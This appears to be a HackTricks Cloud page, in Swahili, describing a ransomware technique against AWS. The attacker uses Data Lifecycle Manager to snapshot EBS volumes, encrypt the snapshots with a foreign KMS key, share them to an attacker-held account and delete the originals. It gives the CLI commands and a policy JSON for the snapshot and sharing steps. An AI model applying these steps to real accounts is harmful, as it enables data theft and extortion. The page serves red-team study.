HackTricks CloudAWS - DLM Post Exploitation
Reading time: 3 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Data Lifecycle Manger (DLM)
EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy
Shambulio la ransomware linaweza kutekelezwa kwa kuficha kiasi kikubwa cha EBS volumes na kisha kufuta EC2 instances, EBS volumes, na snapshots za sasa. Ili kuendesha shughuli hii mbaya, mtu anaweza kutumia Amazon DLM, akificha snapshots kwa kutumia KMS key kutoka akaunti nyingine ya AWS na kuhamasisha snapshots zilizofichwa kwa akaunti tofauti. Vinginevyo, wanaweza kuhamasisha snapshots bila kuficha kwa akaunti wanayosimamia na kisha kuzificha huko. Ingawa si rahisi kuficha EBS volumes au snapshots zilizopo moja kwa moja, inawezekana kufanya hivyo kwa kuunda volume au snapshot mpya.
Kwanza, mtu atatumia amri kukusanya taarifa kuhusu volumes, kama vile instance ID, volume ID, hali ya ufichaji, hali ya kiambatisho, na aina ya volume.
aws ec2 describe-volumes
Pili, mtu ataunda sera ya maisha. Amri hii inatumia DLM API kuanzisha sera ya maisha ambayo kiotomatiki inachukua snapshots za kila siku za volumes zilizotajwa kwa wakati maalum. Pia inatumia lebo maalum kwa snapshots na nakala za lebo kutoka kwa volumes hadi snapshots. Faili ya policyDetails.json inajumuisha maelezo ya sera ya maisha, kama vile lebo za lengo, ratiba, ARN ya KMS key ya hiari kwa ajili ya ufichaji, na akaunti ya lengo kwa ajili ya kushiriki snapshots, ambayo itarekodiwa katika kumbukumbu za CloudTrail za mwathirika.
aws dlm create-lifecycle-policy --description "My first policy" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json
Kiolezo cha hati ya sera kinaweza kuonekana hapa:
{
"PolicyType": "EBS_SNAPSHOT_MANAGEMENT",
"ResourceTypes": [
"VOLUME"
],
"TargetTags": [
{
"Key": "ExampleKey",
"Value": "ExampleValue"
}
],
"Schedules": [
{
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
{
"Key": "SnapshotCreator",
"Value": "DLM"
}
],
"VariableTags": [
{
"Key": "CostCenter",
"Value": "Finance"
}
],
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"03:00"
]
},
"RetainRule": {
"Count": 14
},
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
},
"CrossRegionCopyRules": [
{
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
}
}
],
"ShareRules": [
{
"TargetAccounts": [
"123456789012"
],
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
}
]
}
],
"Parameters": {
"ExcludeBootVolume": false
}
}
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.